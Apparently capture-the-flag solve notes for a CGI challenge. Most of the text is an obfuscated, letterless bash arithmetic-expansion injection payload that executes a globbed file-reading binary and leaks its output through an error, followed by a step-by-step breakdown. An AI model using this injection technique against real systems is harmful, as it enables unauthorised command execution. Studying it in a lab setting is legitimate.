/usr/lib/cgi-bin/index.cgi

solve
_[$(__=$(($$-$$));___=$(($$/$$));____=$(($___+$___));_____=$(($____*$____));______=$(($_____*$____));_______=$(($______*$____));________=$(($_______*$____));_________=$(<${!__});__________=$(../../???/${_________:(($____+$______+$_______)):(($___))}?${_________:(($______)):(($___))}?);v${__________:$___})]

pre
# Make variables for 0,1,2,4...
__=$(($$-$$));___=$(($$/$$));____=$(($___+$___));_____=$(($____*$____));______=$(($_____*$____));_______=$(($______*$____));________=$(($_______*$____));

_[$(__=$(($$-$$));___=$(($$/$$));____=$(($___+$___));_____=$(($____*$____));______=$(($_____*$____));_______=$(($______*$____));________=$(($_______*$____));_________=$(<${!__});GO)]

# Current file content
_________=$(<${!__})


GO
# ../../???/f?a?
__________=$(../../???/
${_________:(($____+$______+$_______)):(($___))}	//11010 => 26
?
${_________:(($______)):(($___))}	//1000 => 8
?

# Execute to cause error
v${__________:$___}